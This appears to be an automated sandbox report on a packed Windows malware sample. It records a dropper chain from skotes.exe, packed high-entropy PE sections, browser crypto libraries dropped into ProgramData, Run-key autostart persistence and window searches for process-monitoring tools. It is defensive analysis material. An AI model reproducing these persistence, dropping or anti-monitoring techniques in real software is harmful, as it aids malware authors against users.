Source: C:\Users\user\AppData\Local\Temp\1004157001\a8e43ec2b6.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1004157001\a8e43ec2b6.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1004156001\2f0cb7128a.exe	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\1004156001\2f0cb7128a.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1004156001\2f0cb7128a.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1004156001\2f0cb7128a.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1004156001\2f0cb7128a.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1004156001\2f0cb7128a.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1004156001\2f0cb7128a.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1004156001\2f0cb7128a.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1004156001\2f0cb7128a.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1004156001\2f0cb7128a.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1004156001\2f0cb7128a.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: profapi.dll

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: file.exe

Static file information: File size 3235328 > 1048576

Source: file.exe

Static PE information: Raw size of dwzjxvhv is bigger than: 0x100000 < 0x2aa200

Source:	Binary string: mozglue.pdbP source: c4df60870c.exe, 0000000A.00000002.3022164511.000000006BF0D000.00000002.00000001.01000000.0000001C.sdmp
Source:	Binary string: nss3.pdb@ source: c4df60870c.exe, 0000000A.00000002.3024863817.000000006C0CF000.00000002.00000001.01000000.0000001B.sdmp
Source:	Binary string: my_library.pdbU source: c4df60870c.exe, 0000000A.00000002.3027918391.000000006C331000.00000002.00000001.01000000.0000000F.sdmp, c4df60870c.exe, 0000000A.00000002.2959179677.000000000019C000.00000040.00000001.01000000.0000000B.sdmp, c4df60870c.exe, 0000000A.00000003.2593195591.000000000504B000.00000004.00001000.00020000.00000000.sdmp, 0d287ea527.exe, 00000012.00000002.3009795349.000000000618C000.00000040.00000800.00020000.00000000.sdmp
Source:	Binary string: BitLockerToGo.pdb source: freecam.exe, 00000007.00000002.2708343431.0000000011E2E000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: my_library.pdb source: c4df60870c.exe, 0000000A.00000002.3027918391.000000006C331000.00000002.00000001.01000000.0000000F.sdmp, c4df60870c.exe, 0000000A.00000002.2959179677.000000000019C000.00000040.00000001.01000000.0000000B.sdmp, c4df60870c.exe, 0000000A.00000003.2593195591.000000000504B000.00000004.00001000.00020000.00000000.sdmp, 0d287ea527.exe, 00000012.00000002.3009795349.000000000618C000.00000040.00000800.00020000.00000000.sdmp
Source:	Binary string: +Inf-1.0-Inf-inf...:...`.3dm.INF.Inf.NAN.NaN.aab.aam.aas.abc.ace.afl.aif.aim.aip.alz.ani.aos.apk.aps.arc.arj.art.asf.asm.asp.asx.avi.avs.bat.bin.bmp.boo.boz.bsh.bz2.c++.cab.cat.cco.cdf.cer.cha.cmd.com.cpp.cpt.crl.crt.crx.csh.css.csv.cxx.dar.dcr.deb.def.der.dif.dir.dmg.doc.dot.drw.dvi.dwf.dwg.dxf.dxr.elc.eml.env.eps.etx.evy.exe.f77.f90.fdf.fif.fli.flo.flv.flw.flx.fmf.for.fpx.frl.gif.gsd.gsm.gsp.gss.hdf.hgl.hlb.hlp.hpg.hqx.hta.htc.htm.htt.htx.ice.ico.ics.icz.idc.ief.igs.ima.inf.ins.isu.ivr.ivy.jam.jav.jcm.jpe.jpg.jps.jut.kar.key.kfo.kml.kmz.kon.kpr.kpt.ksh.ksp.kth.kwd.kwt.lam.lha.lhx.lma.log.lsp.lst.lsx.ltx.lzh.lzx.m1v.m2a.m2v.m3u.man.map.mar.mbd.mc$.mcd.mcf.mcp.mht.mid.mif.mjf.mjs.mme.mod.mov.mp2.mp3.mp4.mpa.mpc.mpe.mpg.mpp.mpt.mpv.mpx.mrc.mzz.nan.nap.ncm.nif.nix.nsc.nvd.oda.odb.odc.odf.odg.odi.odm.odp.ods.odt.oex.oga.ogg.ogv.omc.otc.otf.otg.oth.oti.otm.otp.ots.ott.p10.p12.p7a.p7c.p7m.p7r.p7s.pas.pbm.pcl.pct.pcx.pdb.pdf.pgm.pic.pkg.pko.plx.pm4.pm5.png.pnm.pot.pov.ppa.ppm.pps.ppt.ppz.pre.prt.psd.pvu.pwz.pyc.qcp.qd3.qif.qtc.qti.ram.rar.ras.rgb.rmi.rmm.rmp.rng.rnx.rpm.rtf.rtx.s3m.s7z.sbk.scm.sdp.sdr.sea.set.sgm.sid.sit.skd.skm.skp.skt.smi.snd.sol.spc.spl.spr.spx.src.ssi.ssm.sst.stl.stp.svf.svg.svr.swf.tar.tbk.tcl.tex.tgz.tif.tsi.tsp.tsv.txt.uil.uni.unv.uri.uue.vcd.vcf.vcs.vda.vdo.vew.viv.vmd.vmf.voc.vos.vox.vqe.vqf.vql.vrt.vsd.vst.vsw.w60.w61.w6w.wav.wb1.web.wiz.wk1.wmf.wml.wp5.wp6.wpd.wq1.wri.wrl.wrz.wsc.wtk.xbm.xdr.xgz.xif.xla.xlb.xlc.xld.xlk.xll.xlm.xls.xlt.xlv.xlw.xml.xmz.xpi.xpm.xsr.xwd.xyz.zip.zoo.zsh/qps0000044006600x%x108012341;311;321;331;341;351;361;371;4420063125: p=::/0:ext<!--<%s>ACDTACSTAEDTAESTAKDTAKSTAMP;AUTHAWSTAcy;Afr;AhomAnd;AtoiAumlBcy;BetaBfr;ByteCESTCHARCOFFCOM1COM2COM3COM4COM5COM6COM7COM8COM9COPYCallCap;Cfr;ChamCharChi;Cup;DATADashDataDateDcy;Del;Dfr;Dot;EESTENG;ETH;EXECEcy;Efr;EnumEta;EtagEumlFcy;Ffr;FileFromGOGCGcy;Gfr;GoneHEADHat;Hfr;HighHostIMAGINFOIcy;Ifr;Int;IotaIumlJcy;Jfr;JulyJuneKcy;Kfr;KindLEAFLOCKLPT1LPT2LPT3LPT4LPT5LPT6LPT7LPT8LPT9LTCGLcy;Lfr;LisuLongLsh;MOVEMap;Mcy;Mfr;MiaoMiscModiNASANB10NOOPNULLNZDTNZSTNameNcy;NewaNfr;Not;NullOcy;Ofr;OumlPE32PE64PINGPOGOPOSTPathPcy;Pfr;Phi;Psi;QUITQUOTQfr;REG;RSDSRSETRcy;Rfr;Rho;Rsh;SASTScy;Sfr;StatSub;Sum;Sup;TRUETab;Tau;Tcy;Tfr;ThaiTo: TrapTrueTypeUcy;Ufr;UintUumlVcy;Vee;Vfr;VoidWARNWfr;WordXBOXXXX_Xfr;Ycy;Yfr;YumlZcy;ZetaZfr;[]%s\/[]\u00 source: freecam.exe, 00000007.00000002.2669978281.0000000000968000.00000002.00000001.01000000.00000009.sdmp
Source:	Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: 0d287ea527.exe, 00000009.00000003.2851498640.0000000007AE0000.00000004.00001000.00020000.00000000.sdmp, 0d287ea527.exe, 00000009.00000002.2948806389.0000000005752000.00000040.00000800.00020000.00000000.sdmp, a8e43ec2b6.exe, 0000001F.00000002.2853171135.0000000000142000.00000040.00000001.01000000.00000014.sdmp
Source:	Binary string: nss3.pdb source: c4df60870c.exe, 0000000A.00000002.3024863817.000000006C0CF000.00000002.00000001.01000000.0000001B.sdmp
Source:	Binary string: mozglue.pdb source: c4df60870c.exe, 0000000A.00000002.3022164511.000000006BF0D000.00000002.00000001.01000000.0000001C.sdmp
Source:	Binary string: BitLockerToGo.pdbGCTL source: freecam.exe, 00000007.00000002.2708343431.0000000011E2E000.00000004.00001000.00020000.00000000.sdmp

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\file.exe	Unpacked PE file: 0.2.file.exe.f00000.0.unpack :EW;.rsrc:W;.idata :W;dwzjxvhv:EW;mmbykldk:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;dwzjxvhv:EW;mmbykldk:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Unpacked PE file: 1.2.skotes.exe.940000.0.unpack :EW;.rsrc:W;.idata :W;dwzjxvhv:EW;mmbykldk:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;dwzjxvhv:EW;mmbykldk:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Unpacked PE file: 2.2.skotes.exe.940000.0.unpack :EW;.rsrc:W;.idata :W;dwzjxvhv:EW;mmbykldk:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;dwzjxvhv:EW;mmbykldk:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Unpacked PE file: 6.2.skotes.exe.940000.0.unpack :EW;.rsrc:W;.idata :W;dwzjxvhv:EW;mmbykldk:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;dwzjxvhv:EW;mmbykldk:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Unpacked PE file: 9.2.0d287ea527.exe.9c0000.0.unpack :EW;.rsrc:W;.idata :W;uxuaewjg:EW;tafnuvmn:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;uxuaewjg:EW;tafnuvmn:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe	Unpacked PE file: 10.2.c4df60870c.exe.170000.0.unpack :EW;.rsrc :W;.idata :W; :EW;kwdkpzgx:EW;juauvnci:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;kwdkpzgx:EW;juauvnci:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Unpacked PE file: 18.2.0d287ea527.exe.9c0000.0.unpack :EW;.rsrc:W;.idata :W;uxuaewjg:EW;tafnuvmn:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;uxuaewjg:EW;tafnuvmn:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1004157001\a8e43ec2b6.exe	Unpacked PE file: 31.2.a8e43ec2b6.exe.140000.0.unpack :EW;.rsrc:W;.idata :W;lnurvrsx:EW;bknhvqdr:EW;.taggant:EW; vs :ER;.rsrc:W;
Source: C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe	Unpacked PE file: 33.2.c4df60870c.exe.170000.0.unpack :EW;.rsrc :W;.idata :W; :EW;kwdkpzgx:EW;juauvnci:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;kwdkpzgx:EW;juauvnci:EW;.taggant:EW;

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: random[1].exe.6.dr	Static PE information: real checksum: 0x30c2a8 should be: 0x3084f4
Source: random[1].exe2.6.dr	Static PE information: real checksum: 0x2a7fff should be: 0x2b1f23
Source: c4df60870c.exe.6.dr	Static PE information: real checksum: 0x20bc8a should be: 0x208240
Source: skotes.exe.0.dr	Static PE information: real checksum: 0x319d05 should be: 0x31f7f4
Source: random[1].exe0.6.dr	Static PE information: real checksum: 0x20bc8a should be: 0x208240
Source: DocumentsDHDHJJJECF.exe.10.dr	Static PE information: real checksum: 0x319d05 should be: 0xb490
Source: chrome.dll.10.dr	Static PE information: real checksum: 0x0 should be: 0xb0b18
Source: random[2].exe.10.dr	Static PE information: real checksum: 0x319d05 should be: 0xb490
Source: a8e43ec2b6.exe.6.dr	Static PE information: real checksum: 0x2a7fff should be: 0x2b1f23
Source: file.exe	Static PE information: real checksum: 0x319d05 should be: 0x31f7f4
Source: 0d287ea527.exe.6.dr	Static PE information: real checksum: 0x30c2a8 should be: 0x3084f4

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name: dwzjxvhv
Source: file.exe	Static PE information: section name: mmbykldk
Source: file.exe	Static PE information: section name: .taggant
Source: skotes.exe.0.dr	Static PE information: section name:
Source: skotes.exe.0.dr	Static PE information: section name: .idata
Source: skotes.exe.0.dr	Static PE information: section name: dwzjxvhv
Source: skotes.exe.0.dr	Static PE information: section name: mmbykldk
Source: skotes.exe.0.dr	Static PE information: section name: .taggant
Source: freecam[1].exe.6.dr	Static PE information: section name: .symtab
Source: freecam.exe.6.dr	Static PE information: section name: .symtab
Source: random[1].exe.6.dr	Static PE information: section name:
Source: random[1].exe.6.dr	Static PE information: section name: .idata
Source: random[1].exe.6.dr	Static PE information: section name: uxuaewjg
Source: random[1].exe.6.dr	Static PE information: section name: tafnuvmn
Source: random[1].exe.6.dr	Static PE information: section name: .taggant
Source: 0d287ea527.exe.6.dr	Static PE information: section name:
Source: 0d287ea527.exe.6.dr	Static PE information: section name: .idata
Source: 0d287ea527.exe.6.dr	Static PE information: section name: uxuaewjg
Source: 0d287ea527.exe.6.dr	Static PE information: section name: tafnuvmn
Source: 0d287ea527.exe.6.dr	Static PE information: section name: .taggant
Source: random[1].exe0.6.dr	Static PE information: section name:
Source: random[1].exe0.6.dr	Static PE information: section name: .rsrc
Source: random[1].exe0.6.dr	Static PE information: section name: .idata
Source: random[1].exe0.6.dr	Static PE information: section name:
Source: random[1].exe0.6.dr	Static PE information: section name: kwdkpzgx
Source: random[1].exe0.6.dr	Static PE information: section name: juauvnci
Source: random[1].exe0.6.dr	Static PE information: section name: .taggant
Source: c4df60870c.exe.6.dr	Static PE information: section name:
Source: c4df60870c.exe.6.dr	Static PE information: section name: .rsrc
Source: c4df60870c.exe.6.dr	Static PE information: section name: .idata
Source: c4df60870c.exe.6.dr	Static PE information: section name:
Source: c4df60870c.exe.6.dr	Static PE information: section name: kwdkpzgx
Source: c4df60870c.exe.6.dr	Static PE information: section name: juauvnci
Source: c4df60870c.exe.6.dr	Static PE information: section name: .taggant
Source: random[1].exe2.6.dr	Static PE information: section name:
Source: random[1].exe2.6.dr	Static PE information: section name: .idata
Source: random[1].exe2.6.dr	Static PE information: section name: lnurvrsx
Source: random[1].exe2.6.dr	Static PE information: section name: bknhvqdr
Source: random[1].exe2.6.dr	Static PE information: section name: .taggant
Source: a8e43ec2b6.exe.6.dr	Static PE information: section name:
Source: a8e43ec2b6.exe.6.dr	Static PE information: section name: .idata
Source: a8e43ec2b6.exe.6.dr	Static PE information: section name: lnurvrsx
Source: a8e43ec2b6.exe.6.dr	Static PE information: section name: bknhvqdr
Source: a8e43ec2b6.exe.6.dr	Static PE information: section name: .taggant
Source: DocumentsDHDHJJJECF.exe.10.dr	Static PE information: section name:
Source: DocumentsDHDHJJJECF.exe.10.dr	Static PE information: section name: .idata
Source: DocumentsDHDHJJJECF.exe.10.dr	Static PE information: section name: dwzjxvhv
Source: DocumentsDHDHJJJECF.exe.10.dr	Static PE information: section name: mmbykldk
Source: DocumentsDHDHJJJECF.exe.10.dr	Static PE information: section name: .taggant
Source: random[2].exe.10.dr	Static PE information: section name:
Source: random[2].exe.10.dr	Static PE information: section name: .idata
Source: random[2].exe.10.dr	Static PE information: section name: dwzjxvhv
Source: random[2].exe.10.dr	Static PE information: section name: mmbykldk
Source: random[2].exe.10.dr	Static PE information: section name: .taggant
Source: freebl3.dll.10.dr	Static PE information: section name: .00cfg
Source: softokn3.dll.10.dr	Static PE information: section name: .00cfg
Source: softokn3[1].dll.10.dr	Static PE information: section name: .00cfg
Source: freebl3[1].dll.10.dr	Static PE information: section name: .00cfg
Source: mozglue.dll.10.dr	Static PE information: section name: .00cfg
Source: mozglue[1].dll.10.dr	Static PE information: section name: .00cfg
Source: msvcp140.dll.10.dr	Static PE information: section name: .didat
Source: msvcp140[1].dll.10.dr	Static PE information: section name: .didat
Source: nss3.dll.10.dr	Static PE information: section name: .00cfg
Source: nss3[1].dll.10.dr	Static PE information: section name: .00cfg

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F1D91C push ecx; ret	0_2_00F1D92F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F11359 push es; ret	0_2_00F1135A
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 1_2_0095D91C push ecx; ret	1_2_0095D92F
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_0095D91C push ecx; ret	2_2_0095D92F
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_0095D91C push ecx; ret	6_2_0095D92F
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_0097DEDB push ss; iretd	6_2_0097DEDC
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_0095DFC6 push ecx; ret	6_2_0095DFD9
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Code function: 9_3_00778D59 push ebx; ret	9_3_00778D98
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Code function: 9_3_00777E2E push esp; retf	9_3_00777E2F
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Code function: 9_3_00777E2E push esp; retf	9_3_00777E2F
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Code function: 9_3_00774E0B push esi; retf 002Dh	9_3_00774E2A
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Code function: 9_3_00774E0B push esi; retf 002Dh	9_3_00774E2A
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Code function: 9_3_00774E0B push esi; retf 002Dh	9_3_00774E2A
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Code function: 9_3_00774DE9 push esi; retn 002Dh	9_3_00774DEA
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Code function: 9_3_00774DE9 push esi; retn 002Dh	9_3_00774DEA
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Code function: 9_3_00774DE9 push esi; retn 002Dh	9_3_00774DEA
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Code function: 9_3_007774D7 push ebx; iretd	9_3_0077758A
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Code function: 9_3_007774D7 push ebx; iretd	9_3_0077758A
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Code function: 9_3_0078AAEE push ebp; iretd	9_3_0078AAEF
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Code function: 9_3_0078AAEE push ebp; iretd	9_3_0078AAEF
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Code function: 9_3_0078AAEE push ebp; iretd	9_3_0078AAEF
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Code function: 9_3_0078AAEE push ebp; iretd	9_3_0078AAEF
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Code function: 9_3_0078AAEE push ebp; iretd	9_3_0078AAEF
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Code function: 9_3_0078AAEE push ebp; iretd	9_3_0078AAEF
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Code function: 9_3_0078AAEE push ebp; iretd	9_3_0078AAEF
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Code function: 9_3_0078A8CA push ecx; retf	9_3_0078A8F0
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Code function: 9_3_0078A8CA push ecx; retf	9_3_0078A8F0
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Code function: 9_3_0078A8CA push ecx; retf	9_3_0078A8F0
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Code function: 9_3_0078A8CA push ecx; retf	9_3_0078A8F0
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Code function: 9_3_0078A8CA push ecx; retf	9_3_0078A8F0
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Code function: 9_3_0078A8CA push ecx; retf	9_3_0078A8F0

Source: file.exe	Static PE information: section name: entropy: 7.098034076925693
Source: skotes.exe.0.dr	Static PE information: section name: entropy: 7.098034076925693
Source: random[1].exe.6.dr	Static PE information: section name: entropy: 7.05395571278639
Source: 0d287ea527.exe.6.dr	Static PE information: section name: entropy: 7.05395571278639
Source: random[1].exe0.6.dr	Static PE information: section name: kwdkpzgx entropy: 7.9535469502980245
Source: c4df60870c.exe.6.dr	Static PE information: section name: kwdkpzgx entropy: 7.9535469502980245
Source: random[1].exe2.6.dr	Static PE information: section name: entropy: 7.794186223461594
Source: a8e43ec2b6.exe.6.dr	Static PE information: section name: entropy: 7.794186223461594
Source: DocumentsDHDHJJJECF.exe.10.dr	Static PE information: section name: entropy: 7.332629487162313
Source: random[2].exe.10.dr	Static PE information: section name: entropy: 7.332629487162313

Persistence and Installation Behavior

Drops PE files to the document folder of the user

Source: C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe

File created: C:\Users\user\DocumentsDHDHJJJECF.exe

Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1004157001\a8e43ec2b6.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1004156001\2f0cb7128a.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\freecam[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe	File created: C:\ProgramData\chrome.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[2].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1004149001\freecam.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe	File created: C:\Users\user\DocumentsDHDHJJJECF.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe	File created: C:\ProgramData\chrome.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe

File created: C:\Users\user\DocumentsDHDHJJJECF.exe

Jump to dropped file

Boot Survival

Creates multiple autostart registry keys

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run c4df60870c.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run a8e43ec2b6.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 2f0cb7128a.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 0d287ea527.exe	Jump to behavior

Drops PE files to the user root directory

Source: C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe

File created: C:\Users\user\DocumentsDHDHJJJECF.exe

Jump to dropped file

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: RegmonClass	Jump to behavior
